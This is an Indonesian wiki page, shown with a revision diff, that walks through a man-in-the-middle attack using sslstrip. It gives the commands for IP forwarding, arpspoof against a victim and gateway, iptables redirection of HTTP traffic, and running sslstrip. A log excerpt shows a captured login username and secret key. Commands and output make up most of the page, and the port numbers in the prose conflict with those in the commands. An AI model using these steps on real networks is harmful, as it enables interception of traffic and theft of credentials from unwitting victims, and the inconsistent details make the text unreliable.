Difference between revisions of "MITM: sslstrip"

From OnnoWiki
Jump to navigation Jump to search
Line 11: Line 11:
 
enable forward paket,
 
enable forward paket,
  
  echo “1” > /proc/sys/net/ipv4/ip_forward
+
  echo 1 > /proc/sys/net/ipv4/ip_forward
 
   
 
   
 
lakukan arpspoof,
 
lakukan arpspoof,
Line 46: Line 46:
  
 
  iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
 
  iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
  iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT --to-port 8080
+
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  
 
Jalankan sslstrip agar listen pada port 10000 (default sslstrip)
 
Jalankan sslstrip agar listen pada port 10000 (default sslstrip)

Revision as of 11:08, 2 October 2018

Sumber: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/


Langkah untuk melakukan serangan menggunakan ssltrip adalah sebagai berikut.

Cek routing, 

route -n
netstat -nr

enable forward paket, 

echo 1 > /proc/sys/net/ipv4/ip_forward

lakukan arpspoof, 

arpspoof -i eth0 -t victimip routerip

arpspoof -i eth0 -t 192.168.0.106 192.168.0.100
192.168.0.106 = ip victim
192.168.0.100 = ip router / gateway / server yang akan di monitor

Cek apakah berhasil, arp -n di 192.168.0.106 

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   66:31:65:39:62:38   C                     enp3s0

Setelah arpspoof di jalankan, lakukan arp -n 

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.146            ether   08:00:27:45:7a:dc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   08:00:27:45:7a:dc   C                     enp3s0

Perhatikan MAC address 192.168.0.100 berubah :) ..


redirect inbound traffic ke port 80 (http), menuju port 1000 (sslstrip). 

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Jalankan sslstrip agar listen pada port 10000 (default sslstrip) 

cd ~
sslstrip -l 8080 (untuk kali linux)
python sslstrip.pl –l 8080 (untuk backtrack)

hasil penyadapan bisa dilihat di sslstrip.log, misalnya, 

cd ~
tail sslstrip.log
more sslstrip.log 

2017-04-04 17:07:16,065 POST Data (192.168.0.100):
login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1


Crashing

Entah kenapa sslstrip ini suka crash :( ...

Solusinya, coba tambahkan > /dev/null 

sslstrip -k -f -l 10000 2> /dev/null


Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=MITM:_sslstrip&oldid=51909"